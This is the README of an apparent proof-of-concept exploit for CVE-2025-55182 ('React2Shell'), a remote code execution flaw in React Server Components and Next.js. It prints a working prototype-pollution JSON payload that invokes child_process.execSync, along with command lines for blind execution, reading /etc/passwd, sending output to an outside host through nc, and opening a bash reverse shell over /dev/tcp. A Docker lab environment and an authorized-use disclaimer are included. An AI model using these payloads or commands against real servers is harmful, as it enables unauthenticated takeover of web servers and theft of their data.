Share
## https://sploitus.com/exploit?id=51FC38EF-39EB-53A8-AB8A-27EC64B9C4A7
# CVE-2025-55182 - React2Shell PoC
A proof of concept exploit for CVE-2025-55182, a critical (CVSS 10.0) unauthenticated remote code execution vulnerability in React Server Components.
## Credit
**Discovered by [Lachlan Davidson](https://react2shell.com/)** - Disclosed to Meta/React team on November 29, 2025.
Additional PoC contributions by:
- [maple3142](https://github.com/maple3142)
- [Moritz Sanft](https://github.com/moritzsanft)
## Vulnerability Overview
The vulnerability exists in the React Flight protocol's deserialization logic. By sending a malicious payload via HTTP POST, an attacker can achieve prototype pollution that leads to arbitrary code execution on the server.
### Affected Versions
| Package | Vulnerable Versions |
|---------|---------------------|
| react-server-dom-webpack | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| react-server-dom-parcel | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| react-server-dom-turbopack | 19.0.0, 19.1.0, 19.1.1, 19.2.0 |
| Next.js | 15.0.4, 15.1.8, 15.2.5, 15.3.5, 15.4.7, 15.5.6, 16.0.6 |
### Affected Frameworks
- Next.js
- React Router (with RSC)
- Waku
- @parcel/rsc
- @vitejs/plugin-rsc
- rwsdk (Redwood)
## Files
```
.
โโโ exploit.py # exploit script
โโโ docker-compose.yml # Vulnerable test environment
โโโ vulnerable-app/ # Vulnerable Next.js application
โโโ README.md
```
## Quick Start
### 1. Start the Vulnerable Container
```bash
docker compose up -d
```
This starts a vulnerable Next.js application on `http://localhost:3000`.
### 2. Check if Target is Vulnerable
```bash
python3 exploit.py -u http://localhost:3000 --check
```
This performs a non-exploitative check for indicators including:
- Framework detection (Next.js, Waku, React Router, etc.)
- Flight protocol markers
- Server Actions
- Version detection
### 3. Exploit (Blind Execution)
```bash
python3 exploit.py -u http://localhost:3000 -c "id"
```
Executes a command without seeing output. Verify with:
### 4. Exploit with Output Exfiltration
```bash
python3 exploit.py -u http://localhost:3000 -c "id" --exfil :
```
Your IP Address;
Port to listen on
## Usage
```
usage: exploit.py [-h] -u URL [-c COMMAND] [--check] [--exfil HOST:PORT]
[--timeout TIMEOUT] [--no-verify]
options:
-u, --url URL Target URL
-c, --command CMD Command to execute
--check Check if vulnerable (non-exploitative)
--exfil HOST:PORT Exfiltrate output to HOST:PORT
--timeout TIMEOUT Request timeout (default: 10)
--no-verify Disable SSL verification
```
## Examples
```bash
# Check vulnerability
python3 exploit.py -u http://localhost:3000 --check
# Blind RCE
python3 exploit.py -u http://localhost:3000 -c "touch /tmp/pwned"
# RCE with output
python3 exploit.py -u http://localhost:3000 -c "whoami" --exfil 172.17.0.1:9999
# Read files
python3 exploit.py -u http://localhost:3000 -c "cat /etc/passwd" --exfil 172.17.0.1:9999
# Reverse shell
python3 exploit.py -u http://localhost:3000 -c "bash -c 'bash -i >& /dev/tcp/172.17.0.1/4444 0>&1'"
```
## Payload Structure
```json
{
"then": "$1:__proto__:then",
"status": "resolved_model",
"reason": -1,
"value": "{\"then\": \"$B0\"}",
"_response": {
"_prefix": "process.mainModule.require('child_process').execSync('id');",
"_formData": {
"get": "$1:constructor:constructor"
}
}
}
```
## Exfiltration
The exploit corrupts server state during execution, making in-band response exfiltration unreliable. The `--exfil` flag uses out-of-band exfiltration:
```
โโโโโโโโโโโโ 1. Malicious POST โโโโโโโโโโโโ
โ Attacker โ โโโโโโโโโโโโโโโโโโโบ โ Server โ
โโโโโโโโโโโโ โโโโโโโโโโโโ
โฒ โ
โ 3. Command output โ 2. RCE executes:
โ via nc โ cmd | nc attacker port
โ โผ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
```
## Cleanup
```bash
docker compose down
```
## Disclaimer
This tool is for authorized security testing and educational purposes only. Only use against systems you have permission to test.
## References
- [React Security Advisory](https://react.dev/blog/2025/12/03/critical-security-vulnerability-in-react-server-components)
- [NVD - CVE-2025-55182](https://nvd.nist.gov/vuln/detail/CVE-2025-55182)
- [Datadog Security Labs](https://securitylabs.datadoghq.com/articles/cve-2025-55182-react2shell-remote-code-execution-react-server-components/)